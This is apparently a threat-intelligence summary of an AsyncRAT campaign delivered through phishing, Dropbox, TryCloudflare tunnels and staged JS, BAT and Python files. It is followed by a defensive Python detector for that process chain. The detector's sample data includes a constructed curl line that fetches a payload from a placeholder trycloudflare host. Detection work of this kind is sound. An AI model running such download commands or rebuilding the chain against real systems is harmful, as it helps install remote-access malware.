A new AsyncRAT malware campaign has been identified that delivers malicious payloads through TryCloudflare quick tunnels and Python packages. The attack chain begins with a phishing email containing a Dropbox URL, which leads to a ZIP file holding an internet shortcut. Opening the shortcut triggers a series of downloads that ultimately execute the AsyncRAT malware via Python scripts. The campaign relies on legitimate infrastructure such as Dropbox and TryCloudflare to evade detection, and uses a multi-step process involving LNK, JavaScript, and BAT files that culminates in the extraction of malicious Python scripts. The attackers use process injection to place shellcode into legitimate processes such as notepad.exe and explorer.exe. This approach illustrates the continuing abuse of legitimate services for malicious purposes.
Author: AlienVault
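One defender-side way to hunt for the delivery chain described above in process-creation telemetry, as an added example that is not from the AlienVault pulse: it assumes a constructed event shape loosely modelled on Sysmon process-creation records, assumes the JavaScript, BAT and Python stages appear as wscript/cscript, cmd and python images, and uses a constructed downloader command line and placeholder tunnel hostname in the sample data.

```python
from dataclasses import dataclass
# Image basenames assumed for each stage of the chain described in the pulse.
STAGE_IMAGES = [
    {"wscript.exe", "cscript.exe"},   # JavaScript stage
    {"cmd.exe"},                      # BAT stage
    {"python.exe", "pythonw.exe"},    # extracted Python scripts run the loader
]
TUNNEL_DOMAIN = "trycloudflare.com"   # quick-tunnel hosts used to stage payloads
@dataclass
class ProcEvent:          # constructed shape, loosely modelled on Sysmon event ID 1
    pid: int
    ppid: int
    image: str            # executable basename
    cmdline: str

def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen guards against pid-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain[::-1]

def matches_chain(images):
    """True if the stage images occur in order; unrelated ancestors may sit between."""
    stage = 0
    for img in images:
        if stage < len(STAGE_IMAGES) and img in STAGE_IMAGES[stage]:
            stage += 1
    return stage == len(STAGE_IMAGES)

def find_suspicious(events):
    """Return (pid, reason) for processes matching the chain or the tunnel domain."""
    hits = []
    for e in events:
        if e.image.lower() in STAGE_IMAGES[-1] and matches_chain(ancestry(events, e.pid)):
            hits.append((e.pid, "js->bat->python chain"))
        elif TUNNEL_DOMAIN in e.cmdline.lower():
            hits.append((e.pid, "trycloudflare quick tunnel in command line"))
    return hits

# Constructed sample telemetry: one malicious chain plus a benign user launch.
SAMPLE = [
    ProcEvent(200, 100, "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\a.js"),
    ProcEvent(300, 200, "cmd.exe", r"cmd /c C:\Users\u\AppData\Local\Temp\b.bat"),
    ProcEvent(310, 300, "curl.exe", "curl https://EXAMPLE-TUNNEL.trycloudflare.com/p.zip"),
    ProcEvent(400, 300, "python.exe", r"python.exe C:\Users\u\AppData\Local\Temp\p\main.py"),
    ProcEvent(500, 100, "python.exe", r"python.exe C:\dev\app.py"),   # benign: no JS stage
]
```

Running `find_suspicious(SAMPLE)` flags the downloader child of the BAT stage and the Python process whose ancestry is wscript, cmd, python, while the Python process launched directly by the user is left alone.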
Related Tags:
evasion techniques
T1059.006
remote access trojan
T1204.002
T1059.001
T1129
python
AsyncRAT
DropBox
Associated Indicators: